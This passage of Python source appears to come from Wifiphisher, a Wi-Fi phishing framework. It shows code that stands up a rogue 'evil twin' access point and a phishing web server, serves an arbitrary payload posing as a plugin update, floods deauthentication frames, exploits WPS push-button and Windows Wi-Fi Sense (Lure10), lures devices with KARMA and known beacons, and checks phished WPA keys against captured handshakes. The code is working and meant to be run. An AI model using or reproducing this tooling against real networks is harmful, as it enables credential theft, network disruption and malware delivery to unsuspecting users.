otherwise shutdown if access_point: # store choosen access point's information essid = access_point.name channel = access_point.channel target_ap_mac = access_point.mac_address enctype = access_point.encryption else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager(data_pages=args.phishing_pages_directory) # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) logger.info("Selecting {} template".format( template.get_display_name())) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = args.payload_path # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = eval(input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ")) if not os.path.isfile(payload_path): print('[' + R + '-' + W + '] Invalid file path!') print('[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ') template.update_payload_path(os.path.basename(payload_path)) copyfile(payload_path, self.template_manager.template_directory + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if target_ap_mac is not None: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(target_ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': args.phishing_essid or essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # add wps_enable into the template context if args.wps_pbc: template.merge_context({'wps_pbc_attack': "1"}) else: template.merge_context({'wps_pbc_attack': "0"}) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --noextensions is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.network_manager.up_interface(ap_iface) self.access_point.interface = ap_iface self.access_point.channel = channel self.access_point.essid = essid if args.force_hostapd: print('[' + T + '*' + W + '] Using hostapd instead of roguehostapd.' " Many significant features will be turned off." ) self.access_point.force_hostapd = True if args.wpspbc_assoc_interface: wps_mac = self.network_manager.get_interface_mac( args.wpspbc_assoc_interface) self.access_point.deny_mac_addrs.append(wps_mac) if args.presharedkey: self.access_point.presharedkey = args.presharedkey if self.opmode.internet_sharing_enabled(): self.access_point.internet_interface = args.internetinterface print('[' + T + '*' + W + '] Starting the fake access point...') try: self.access_point.start(disable_karma=args.disable_karma) self.access_point.start_dhcp_dns() except BaseException as e: if hasattr(e, 'message'): print(e.message) else: print(e) self.stop() # Start Extension Manager (EM) # We need to start EM before we boot the web server if self.opmode.extensions_enabled(): shared_data = { 'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(), 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled(): # Start HTTP server in a background thread print('[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT)) webserver = Thread( target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] # Main loop. try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) self.stop() except KeyboardInterrupt: self.stop() def run(): try: engine = WifiphisherEngine() engine.start() except KeyboardInterrupt: print(R + '\n (^C)' + O + ' interrupted\n' + W) engine.stop() except EOFError: print(R + '\n (^D)' + O + ' interrupted\n' + W) File: wifiphisher/extensions/__init__.py File: wifiphisher/extensions/handshakeverify.py # pylint: skip-file """ Extension that verifies WPA key by precaptured handshake using cowpatty """ import subprocess from collections import defaultdict import shlex import wifiphisher.common.extensions as extensions def get_process_result(command_string): command = shlex.split(command_string) process = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True) output = "" while True: output += process.stdout.readline().strip() code = process.poll() if code is not None: for lines in process.stdout.readlines(): output += lines.strip() break return output def is_valid_handshake_capture(filename): command = '/bin/cowpatty -c -r {}'.format(filename) output = get_process_result(command) return ("Collected all necessary data" in output) class Handshakeverify(object): def __init__(self, data): self.capt_file = data.args.handshake_capture self.essid = data.target_ap_essid self.key_file_path = "/tmp/keyfile.tmp" self.key = "" self.found = False def send_channels(self): return [] def get_packet(self, packet): return defaultdict(list) def send_output(self): if self.key != "" and self.found: return ["VALID KEY: " + self.key] elif self.key != "" and not self.found: return ["INVALID KEY ({})".format(self.key)] return ["WAITING FOR WPA KEY POST (ESSID: {})".format(self.essid)] def on_exit(self): pass @extensions.register_backend_funcs def psk_verify(self, *list_data): self.key = list_data[0] keyfile = open(self.key_file_path, "w") keyfile.write(self.key + "\n") keyfile.close() command = '/bin/cowpatty -f "{}" -r "{}" -s "{}"'.format(self.key_file_path, self.capt_file, self.essid) self.found = False output = get_process_result(command) if "The PSK is" in output: self.found = True if self.key != "" and self.found: return 'success' elif self.key != "" and not self.found: return 'fail' return 'unknown' File: wifiphisher/extensions/deauth.py """ Extension that sends 3 DEAUTH/DISAS Frames: 1 from the AP to the client 1 from the client to the AP 1 to the broadcast address """ import logging from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal logger = logging.getLogger(__name__) def is_deauth_frame(packet): """ Determine if the sending frame is deauth frame :param packet: A scapy.layers.RadioTap object :type packet: scapy.layers.RadioTap :return: True if the frame is belonged to deauth module :rtype: bool """ if packet.subtype == 10 or packet.subtype == 12: return True return False class Deauth(object): """ Handles all the deauthentication process. """ def __init__(self, data): """ Setup the class with all the given arguments. :param self: A Deauth object :param data: Shared data from main engine :type self: Deauth :type data: tuple :return: None :rtype: None """ self._observed_clients = set() self._should_continue = True self._data = data # the bssids having the same ESSID self._deauth_bssids = dict() # channel mapping to the frames list self._packets_to_send = defaultdict(list) @staticmethod def _craft_packet(sender, receiver, bssid): """ Return a list with disassociation packet followed by a deauthentication packet :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :param bssid: The MAC address of the AccessPoint :type sender: str :type receiver: str :type bssid: str :return: list :rtype: A list with disassociation followed by deauthentication packet """ # craft disassociation packet disassoc_part = dot11.Dot11( type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) disassoc_packet = ( dot11.RadioTap() / disassoc_part / dot11.Dot11Disas()) # craft deauthentication packet deauth_part = dot11.Dot11( type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) deauth_packet = (dot11.RadioTap() / deauth_part / dot11.Dot11Deauth()) return [disassoc_packet, deauth_packet] @staticmethod def _extract_bssid(packet): """ Return the bssid of access point based on the packet type :param packet: A scapy.layers.RadioTap object :type packet: scapy.layers.RadioTap :return: bssid or None if it is WDS :rtype: str or None .. note: 0 0 -> IBBS 0 1 -> from AP 1 0 -> to AP """ ds_value = packet.FCfield & 3 to_ds = ds_value & 0x1 != 0 from_ds = ds_value & 0x2 != 0 # return the correct bssid based on the type return ((not to_ds and not from_ds and packet.addr3) or (not to_ds and from_ds and packet.addr2) or (to_ds and not from_ds and packet.addr1) or None) def _is_target(self, packet): """ Check if this is the target attacking bssid :param self: A Deauth object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: True if this is the target attacking bssid else False :rtype: bool """ if (packet.addr3 != self._data.rogue_ap_mac and packet.addr3 not in self._deauth_bssids): try: essid = packet[dot11.Dot11Elt].info.decode("utf8") except UnicodeDecodeError: logger.warning("Unable to decode the essid with with bssid %s", packet.addr3) return False # only compare essid when -dE is given return ((self._data.args.deauth_essid and essid == self._data.args.deauth_essid) or # frenzy deauth (not self._data.args.deauth_essid and not self._data.target_ap_bssid) or # target_ap_bssid without -dE option (not self._data.args.deauth_essid and self._data.target_ap_bssid == packet.addr3) or False) def get_packet(self, packet): """ Process the Dot11 packets and add any desired clients to observed_clients. :param self: A Deauth object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: A tuple with channel list followed by packets list :rtype: tuple """ packets_to_send = list() # basic malformed frame check try: # Discard WDS frame ds_value = packet.FCfield & 3 if ds_value == 3: return self._packets_to_send receiver = packet.addr1 sender = packet.addr2 except AttributeError: logger.debug("Malformed frame doesn't contain address fields") return self._packets_to_send # obtain the channel for this packet try: # channel is in the third IE of Dot11Elt channel = ord(packet[dot11.Dot11Elt][2].info) # check if this is valid channel if channel not in universal.ALL_2G_CHANNELS: return self._packets_to_send except (TypeError, IndexError): # just return empty channel and packet logger.debug("Malformed frame doesn't contain channel field") return self._packets_to_send bssid = self._extract_bssid(packet) # check beacon if this is our target deauthing BSSID if (packet.haslayer(dot11.Dot11Beacon) and bssid not in self._deauth_bssids and self._is_target(packet)): # listen beacon to get the target attacking BSSIDs for the # specified ESSID packets_to_send += self._craft_packet(bssid, constants.WIFI_BROADCAST, bssid) logger.info("Target deauth BSSID found: %s", bssid) # remember the channel of the given bssid self._deauth_bssids[bssid] = str(channel) elif bssid in self._deauth_bssids: # the bssid is already in the deauth set and we need to check # if the channel of the target AP has been changed if str(channel) != self._deauth_bssids[bssid]: logger.info("BSSID: %s changes channel to %d", bssid, channel) self._update_target_ap_frames(str(channel), str(self._deauth_bssids[bssid]), bssid) if bssid not in self._deauth_bssids: return self._packets_to_send clients = self._add_clients(sender, receiver, bssid) if clients: self._observed_clients.add(clients[0]) packets_to_send += clients[1] logger.info("Client with BSSID %s is now getting deauthenticated", clients[0]) self._packets_to_send[str(channel)] += packets_to_send return self._packets_to_send def _update_target_ap_frames(self, new_channel, old_channel, bssid): """ :param self: A Deauth object :param new_channel: New channel for the target AP :param old_channel: Old channel for the target AP :type self: Deauth :param bssid: Address of the bssid :type new_channel: str :type old_channel: str :type bssid: str :return: None :rtype: None """ old_channel_list = [] new_channel_list = [] for pkt in self._packets_to_send[old_channel]: if pkt.addr3 != bssid: old_channel_list.append(pkt) else: new_channel_list.append(pkt) self._packets_to_send[old_channel] = old_channel_list # append the frames of target AP to the new channel self._packets_to_send[new_channel].extend(new_channel_list) # update the channel of bssid self._deauth_bssids[bssid] = new_channel def _add_clients(self, sender, receiver, bssid): """ Return a tuple containing client followed by packets if the given packet is valid and return None otherwise :param self: A Deauth object :param sender: Address of the sender :param receiver: Address of the receiver :param bssid: Address of the bssid :type self: Deauth :type sender: str :type receiver: str :type bssid: str :return: (client: str, packets: list) or None :rtype: tuple or None """ # addresses that are not acceptable non_valid_addresses = constants.NON_CLIENT_ADDRESSES.union( self._observed_clients) # craft the packets packets = lambda: (self._craft_packet(receiver, sender, bssid) + self._craft_packet(sender, receiver, bssid)) # return the client and packets if valid and None otherwise # it uses short circuiting to improve performance return (sender not in non_valid_addresses and receiver not in non_valid_addresses and (sender == bssid and (receiver, packets()) or receiver == bssid and (sender, packets())) or None) def send_output(self): """ Get any relevant output message :param self: A Deauth object :type self: Deauth :return: A list with all the message entries :rtype: list """ return list(map("DEAUTH/DISAS - {}".format, self._observed_clients)) def send_channels(self): """ Send channes to subscribe :param self: A Deauth object :type self: Deauth :return: A list with all interested channels :rtype: list """ # we cannot do frequency hopping if users have only one card if not self._data.is_freq_hop_allowed: return [self._data.target_ap_channel] if self._data.target_ap_bssid and not self._data.args.deauth_essid\ and not self._data.args.channel_monitor: return [self._data.target_ap_channel] if self._data.args.deauth_channels and \ len(self._data.args.deauth_channels) > 0: return list(map(str, self._data.args.deauth_channels)) return list(map(str, universal.ALL_2G_CHANNELS)) def on_exit(self): """ Free all the resources regarding to this module :param self: A Deauth object :type self: Deauth :return: None :rtype: None """ pass File: wifiphisher/extensions/wpspbc.py """ Extension that sniffs if there is change for WPS PBC exploitation Define three WPS states 1) WPS_IDLE: Wait for target AP bringing WPSPBC IE in the beacon 2) WPS_CONNECTING: If users specify the WPS association interface we can start using wpa_supplicant/wpa_cli to connect to the AP 3) WPS_CONNECTED: We have connected to the AP """ import logging import os import signal import subprocess import time from collections import defaultdict from threading import Timer import scapy.layers.dot11 as dot11 import wifiphisher.common.extensions as extensions logger = logging.getLogger(__name__) WPS_IDLE, WPS_CONNECTING, WPS_CONNECTED = list(range(3)) # wait 3 seconds to give the wps state to the phishinghttp module WAIT_CNT = 3 # define the enum to string marco WPS_2_STR = { WPS_IDLE: "WPS_IDLE", WPS_CONNECTING: "WPS_CONNECTING", WPS_CONNECTED: "WPS_CONNECTED" } def kill_wpa_supplicant(): """ Kill the wpa_supplicant :return: None :rtype: None """ proc = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE) output = proc.communicate()[0] # total processes in the system sys_procs = output.splitlines() for proc in sys_procs: if 'wpa_supplicant' in proc: pid = int(proc.split(None, 1)[0]) os.kill(pid, signal.SIGKILL) class Wpspbc(object): """ Handle the wps exploitation process """ def __init__(self, data): """ Setup the class with all the given arguments. :param self: A Wpspbc object :param data: Shared data from main engine :type self: Deauth :type data: tuple :return: None :rtype: None """ self._data = data self._packets_to_send = defaultdict(list) self._wps_state = WPS_IDLE # to prevent lunch wpa_supplicant multiple times self._is_supplicant_running = False # wps walk time timer self._wps_timer = Timer(120.0, self.wps_timeout_handler) def wps_timeout_handler(self): """ Handle if state is not in CONNECTED after the 2MIN walk time :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ if self.get_wps_state() != WPS_CONNECTED: self.set_wps_state(WPS_IDLE) extensions.is_deauth_cont = True if self._is_supplicant_running: kill_wpa_supplicant() self._is_supplicant_running = False @staticmethod def does_have_wpspbc_ie(packet): """ Check if the pbc button is being pressed :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Wpspbc :type packet: scapy.layers.RadioTap :return: None :rtype: None """ elt_section = packet[dot11.Dot11Elt] while isinstance(elt_section, dot11.Dot11Elt): # check if WPS IE exists if elt_section.ID == 221 and\ elt_section.info.startswith("\x00P\xf2\x04"): # strip the starting 4 bytes wps_ie_array = [ord(val) for val in elt_section.info[4:]] pos = 0 # start looping to find the WPS PBC IE while pos < len(wps_ie_array): if wps_ie_array[pos] == 0x10 and wps_ie_array[pos + 1] == 0x12: return True else: data_len = ( wps_ie_array[pos + 2] << 8) + wps_ie_array[pos + 3] # jump to the next data element by adding # the len of type/length/data pos += (2 + 2 + data_len) break elt_section = elt_section.payload return False def get_wps_state(self): """ Get the current wps state :param self: A Wpspbc object :type self: Wpspbc :return: An intger represented the WPS state :rtype: int """ return self._wps_state def set_wps_state(self, new_state): """ Set the wps state :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ logger.info("wps state is transiting from %s to %s",\ WPS_2_STR[self.get_wps_state()], WPS_2_STR[new_state]) self._wps_state = new_state def is_associated(self): """ Using wpa_cli to check if the wps interface is getting associated :param self: A Wpspbc object :type self: Wpspbc :return: True if the interface is connected else False :rtype: bool """ proc = subprocess.Popen(['wpa_cli', 'status'], stdout=subprocess.PIPE) output = proc.communicate()[0] # not only check the state is in COMPLETED but also needs to check # if we have associated to our own rogueap if the target AP is being # shut down (i.e. supplicant will connect to the OPEN rogue AP if the # target AP is OPEN) if 'COMPLETED' in output and self._data.rogue_ap_mac not in output: return True return False def wps_associate(self): """ Using wpa_supplicant and wpa_cli to associate to the target WPS Access Point :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ if not self._is_supplicant_running: self._is_supplicant_running = True with open("/tmp/wpa_supplicant.conf", 'w') as conf: conf.write("ctrl_interface=/var/run/wpa_supplicant\n") try: proc = subprocess.Popen( [ 'wpa_supplicant', '-i' + self._data.args.wpspbc_assoc_interface, '-Dnl80211', '-c/tmp/wpa_supplicant.conf' ], stdout=subprocess.PIPE) time.sleep(2) if proc.poll() is not None: logger.error("supplicant lunches fail!!") proc = subprocess.Popen( ['wpa_cli', 'wps_pbc'], stdout=subprocess.PIPE) output = proc.communicate()[0] if 'OK' not in output: logger.error( "CONFIG_WPS should be ENABLED when compile wpa_supplicant!!" ) kill_wpa_supplicant() else: logger.info( "Start using wpa_supplicant to connect to WPS AccessPoint" ) self._wps_timer = Timer(120.0, self.wps_timeout_handler) self._wps_timer.start() except OSError: logger.error("wpa_supplicant or wpa_cli are not installed!") def wps_state_handler(self, packet): """ Handler for wps state transition :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Wpspbc :type packet: scapy.layers.RadioTap :return: None :rtype: None """ # check if the frame has wps pbc IE if packet.haslayer(dot11.Dot11Beacon) and\ packet.addr3 == self._data.target_ap_bssid: has_pbc = self.does_have_wpspbc_ie(packet) if self.get_wps_state() == WPS_IDLE: if has_pbc: extensions.is_deauth_cont = False self.set_wps_state(WPS_CONNECTING) elif self.get_wps_state() == WPS_CONNECTING: # if we didn't connect to the WPS in the 2MIN walk time if not has_pbc and not self._wps_timer.is_alive(): self.set_wps_state(WPS_IDLE) # start deauthing again extensions.is_deauth_cont = True # if users specify the wps association interface we start # the automatic association here else: if self._data.args.wpspbc_assoc_interface: self.wps_associate() if self._is_supplicant_running: is_assoc = self.is_associated() # if state is not CONNECTED and timer is not running if not is_assoc and not self._wps_timer.is_alive(): self.set_wps_state(WPS_IDLE) extensions.is_deauth_cont = True self._is_supplicant_running = False kill_wpa_supplicant() elif self.get_wps_state() == WPS_CONNECTING: if is_assoc: self.set_wps_state(WPS_CONNECTED) # stop the walk time timer if self._wps_timer.is_alive(): self._wps_timer.cancel() def get_packet(self, packet): """ Process the Dot11 packets :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: A tuple with channel list followed by packets list :rtype: tuple """ try: bssid = packet.addr3 except AttributeError: logger.debug("Malformed frame doesn't contain address fields") return self._packets_to_send self.wps_state_handler(packet) return self._packets_to_send def send_output(self): """ Get any relevant output message :param self: A Wpspbc object :type self: Wpspbc :return: A list with all the message entries :rtype: list """ if self.get_wps_state() == WPS_CONNECTED: return ["WPS PBC CONNECTED!"] elif self.get_wps_state() == WPS_CONNECTING: return ["WPS PBC button is being pressed for the target AP!"] return [""] def send_channels(self): """ Send channes to subscribe :param self: A Wpspbc object :type self: Wpspbc :return: A list with all interested channels :rtype: list """ return [self._data.target_ap_channel] @extensions.register_backend_funcs def get_wps_state_handler(self, *list_data): """ Backend method for getting the WPS state :param self: A Wpspbc object :type self: Wpspbc :return: A string representing the WPS state :rtype: string """ cnt = 0 # wait maximum 3 seconds to return the wps state while cnt < WAIT_CNT: if self._wps_state != WPS_IDLE: return WPS_2_STR[self._wps_state] cnt += 1 time.sleep(1) return WPS_2_STR[self._wps_state] def on_exit(self): """ Free all the resources regarding to this module :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ self.set_wps_state(WPS_IDLE) if os.path.isfile('/tmp/wpa_supplicant.conf'): os.remove('/tmp/wpa_supplicant.conf') if self._is_supplicant_running: kill_wpa_supplicant() File: wifiphisher/extensions/lure10.py """ Extension that implements the Lure10 attack. Exploits the Wi-Fi Sense feature and will result to automatic association by fooling the Windows Location Service """ import logging from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants logger = logging.getLogger(__name__) class Lure10(object): """ Sends a number of beacons to fool Windows Location Service """ def __init__(self, shared_data): """ Setup the class with all the given arguments :param self: A Lure10 object :param data: Shared data from main engine :type self: Lure10 :type data: dict :return: None :rtype: None """ self.first_run = True self.data = shared_data # store channel to frame list self._packets_to_send = defaultdict(list) def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Lure10 object :param packet: A scapy.layers.RadioTap object :type self: Lure10 :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ beacons = list() bssid = str() # initiliate the _packets_to_send in first run if self.first_run: self._packets_to_send["*"] = beacons # only run this code once if self.first_run and self.data.args.lure10_exploit: # locate the lure10 file area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as _file: for line in _file: # remove any white space and store the BSSD (first word) line.strip() bssid = line.split(" ", 1)[0] # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=0x2105) frame_part_3 = dot11.Dot11Elt(ID="SSID", info="") frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) logger.debug("Add lure10-beacon frame with BSSID %s", bssid) # add the frame to the list beacons.append(complete_frame) # make sure this block is never executed again and the notification occurs self.first_run = False self._packets_to_send["*"] = beacons return self._packets_to_send def send_output(self): """ Sending Lure10 notification :param self: A Lure10 object :type self: Lure10 :return: list of notification messages :rtype: list .. note: Only sends notification for the first time to reduce clutters """ return (not self.first_run and self.data.args.lure10_exploit and ["Lure10 - Spoofing location services"] or []) def send_channels(self): """ Send all interested channels :param self: A Lure10 object :type self: Lure10 :return: A list with all the channels interested :rtype: list .. note: Only the channel of the target AP is sent here """ return [self.data.target_ap_channel] def on_exit(self): """ :param self: A Lure10 object :type self: Lure10 Free all the resources regarding to this module :return: None :rtype: None """ pass File: wifiphisher/extensions/roguehostapdinfo.py """ Extension that interacts with roguehostapd to print relevant information. For example, information regarding automatic association attacks. """ from collections import defaultdict import wifiphisher.common.constants as constants class Roguehostapdinfo(object): """ Handles for printing KARMA attack information """ def __init__(self, data): """ Setup the class with all the given arguments. :param self: A roguehostapdinfo object. :param data: Shared data from main engine :type self: roguehostapdinfo :type data: dictionary :return: None :rtype: None """ self._data = data self._packets_to_send = defaultdict(list) self._mac2ssid_dict = defaultdict() self._known_beacon_ssids = self._get_known_beacon_ssids() def get_packet(self, packet): """ :param self: A roguehostapdinfo object :param packet: A scapy.layers.RadioTap object :type self: roguehostapdinfo :type packet: scapy.layers.RadioTap :return: empty list :rtype: list """ return self._packets_to_send def _get_known_beacon_ssids(self): """ :param self: A roguehostapdinfo object :type self: roguehostapdinfo :return: None :rtype: None """ known_beacons_ssids = set() # locate the known WLANS file if self._data.args.known_beacons: area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() known_beacons_ssids.add(essid) return known_beacons_ssids def send_output(self): """ Send the output the extension manager :param self: A roguehostapdinfo object. :type self: roguehostapdinfo :return: A list with the password checking information :rtype: list ..note: In each packet we ask roguehostapd whether there are victims associated to rogue AP """ info = [] ssid_mac_list = self._data.roguehostapd.get_karma_data() try: mac_list, ssid_list = list(zip(*ssid_mac_list)) except ValueError: # incase ssid_mac_list is still empty mac_list = [] ssid_list = [] # remove the one not in the current associated list pop_macs = [] for mac in self._mac2ssid_dict: if mac not in mac_list: pop_macs.append(mac) for key in pop_macs: self._mac2ssid_dict.pop(key) # add new associated victims to the dictionary for idx, mac in enumerate(mac_list): if mac not in self._mac2ssid_dict: self._mac2ssid_dict[mac] = ssid_list[idx] macssid_pairs = list(self._mac2ssid_dict.items()) for mac, ssid in macssid_pairs: if ssid == self._data.target_ap_essid: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (Evil Twin)" elif ssid not in self._known_beacon_ssids: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (KARMA)" else: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (Known Beacons)" info.append(outputstr) return info def send_channels(self): """ Send channels to subscribe :param self: A roguehostapdinfo object. :type self: roguehostapdinfo :return: empty list :rtype: list ..note: we don't need to send frames in this extension """ return [self._data.target_ap_channel] def on_exit(self): """ Free all the resources regarding to this module :param self: A roguehostapdinfo object. :type self: roguehostapdinfo :return: None :rtype: None """ pass File: wifiphisher/extensions/knownbeacons.py """ Extension that sends a number of known beacons to trigger the AUTO-CONNECT flag. """ import logging import time from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal logger = logging.getLogger(__name__) class Knownbeacons(object): """ Sends a number of known beacons to trigger the Auto-Connect flag. """ def __init__(self, shared_data): """ Setup the class with all the given arguments :param self: A Beacons object :param data: Shared data from main engine :type self: Beacons :type data: dict :return: None :rtype: None """ self.data = shared_data # store channel to frame list self._packets_to_send = defaultdict(list) self._starttime = time.time() self._msg = [] self._full_pkt_list = self._get_known_beacons() def _get_known_beacons(self): """ Retrieve the popular ESSIDs from the text file and then construct all the known beacon frames. :param self: A Beacons object :type self: Beacons :return: A list with all the beacon frames :rtype: list """ beacons = list() essid = str() bssid = self.data.rogue_ap_mac # locate the known WLANS file area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=constants.KB_BEACON_CAP) frame_part_3 = dot11.Dot11Elt(ID="SSID", info=essid) frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) # add the frame to the list beacons.append(complete_frame) return beacons def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Knownbeacons object :param packet: A scapy.layers.RadioTap object :type self: Knownbeacons :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ # If INTERVAL seconds have passed... if (time.time() - self._starttime > constants.KB_INTERVAL): # Do a list shift self._full_pkt_list = self._full_pkt_list[constants.KB_BUCKET_SIZE:] + \ self._full_pkt_list[:constants.KB_BUCKET_SIZE] self._starttime = time.time() first_essid = self._full_pkt_list[0][dot11.Dot11Elt].info.decode("utf8") last_essid = self._full_pkt_list[constants.KB_BUCKET_SIZE-1][dot11.Dot11Elt].info.decode("utf8") self._msg.append("Sending %s known beacons (%s ... %s)" % \ (str(constants.KB_BUCKET_SIZE), first_essid, \ last_essid)) self._packets_to_send["*"] = self._full_pkt_list[:constants.KB_BUCKET_SIZE] return self._packets_to_send def send_output(self): """ Sending Knownbeacons notification :param self: A Knownbeacons object :type self: Knownbeacons :return: list of notification messages :rtype: list .. note: Only sends notification for the first time to reduce clutters """ if self._msg: return self._msg return ["Sending known beacons..."] def send_channels(self): """ Send all interested channels :param self: A Knownbeacons object :type self: Knownbeacons :return: A list with all the channels interested :rtype: list .. note: Only the channel of the target AP is sent here """ return [self.data.target_ap_channel] def on_exit(self): """ :param self: A Knownbeacons object :type self: Knownbeacons Free all the resources regarding to this module :return: None :rtype: None """ pass File: wifiphisher/common/phishinghttp.py import datetime import json import logging import os.path import re import time import asyncio import tornado.ioloop import tornado.web import tornado.platform.asyncio import wifiphisher.common.constants as constants import wifiphisher.common.extensions as extensions import wifiphisher.common.uimethods as uimethods import wifiphisher.common.victim as victim from tornado.escape import json_decode asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy()) hn = logging.NullHandler() hn.setLevel(logging.DEBUG) logging.getLogger('tornado.access').disabled = True logging.getLogger('tornado.general').disabled = True template = False terminate = False creds = [] logger = logging.getLogger(__name__) credential_log_path = None class DowngradeToHTTP(tornado.web.RequestHandler): def get(self): port = self.application.settings.get('port') self.redirect("http://10.0.0.1:{}/".format(port)) class BackendHandler(tornado.web.RequestHandler): """ Validate the POST requests from client by the uimethods """ def initialize(self, em): """ :param self: A tornado.web.RequestHandler object :param em: An extension manager object :type self: tornado.web.RequestHandler :type em: ExtensionManager :return: None :rtype: None """ self.em = em def post(self): """ :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None ..note: override the post method to do the verification """ json_obj = json_decode(self.request.body) response_to_send = {} backend_methods = self.em.get_backend_funcs() # loop all the required verification methods for func_name in list(json_obj.keys()): if func_name in backend_methods: # get the corresponding callback callback = getattr(backend_methods[func_name], func_name) # fire the corresponding varification method response_to_send[func_name] = callback(json_obj[func_name]) else: response_to_send[func_name] = "NotFound" self.write(json.dumps(response_to_send)) class CaptivePortalHandler(tornado.web.RequestHandler): def get(self): """ Override the get method :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None """ requested_file = self.request.path[1:] template_directory = template.get_path() # choose the correct file to serve if os.path.isfile(template_directory + requested_file): render_file = requested_file 